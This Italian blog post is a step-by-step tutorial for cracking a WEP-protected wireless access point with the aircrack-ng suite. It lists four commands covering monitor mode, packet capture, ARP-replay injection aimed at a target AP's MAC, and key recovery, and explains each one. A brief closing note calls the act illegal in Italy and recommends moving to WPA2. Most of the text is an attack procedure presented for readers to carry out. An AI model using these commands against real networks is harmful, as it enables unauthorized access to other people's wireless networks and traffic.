Oramai tutti sanno come si cracca un’ access point con crittografia WEP e quindi per non essere uguale agli altri vi spiego il modo per farlo in un minuto!

Ovviamente utilizzeremo la suite aircrack che risulta essere lo standard de facto del cracking wireless.

Di seguito vi indico i comandi da digitare sul terminale:

1. sudo airmon-ng start wlan0
2. sudo airodump-ng –channel 1 -w nome_file mon0
3. sudo aireplay-ng -h mac_fittizzio -b mac_ap_da_attacare –arpreplay mon0
4. sudo aircrack-ng -a 1 -b mac_ap_da_attacare nome_file-01.cap

Ora vediamo di capire un pò cosa stiamo facendo..

Con il primo comando stiamo mettendo la nostra scheda wifi in una modalità detta monitor mode, è questa modalità che ci permette di ascoltare il traffico che passa nella zona circostante.

Con il secondo comando stiamo ascoltando il traffico che passa sul canale 1 e scrivendolo sul file nome_file, mon0 è la nostra scheda wireless in monitor mode.

Il terzo comando è quello che ci permette di andare veloci nel crack in quanto genera traffico verso l’ap. (Sarebbe meglio lanciare questo comando da un’altra shell)

Il quarto ed ultimo comando legge il file con tutti i dati passati nella rete e tenta il crack, sapremo la chiave quando troveremo scritto KEY FOUND (Sarebbe bene lanciare questo comando da un’altra shell contemporaneamente al comando precedente)

La prossima volta vi spiegherò perchè tutto questo è possibile..

P.S. Se avete fatto questa prova avrete sicuramente notato quant’è facile riuscire a connettersi ad una rete con cifratura WEP, vi ricordo che per la legge italiana è reato violare una protezione, per cui non fatelo e sopratutto avvisate tutti quelli che conoscete di passare per lo meno ad una WPA, meglio WPA2.
Nonostante questa falla sia risaputissima voi non avete idea di quanti router WEP ci sono in giro!!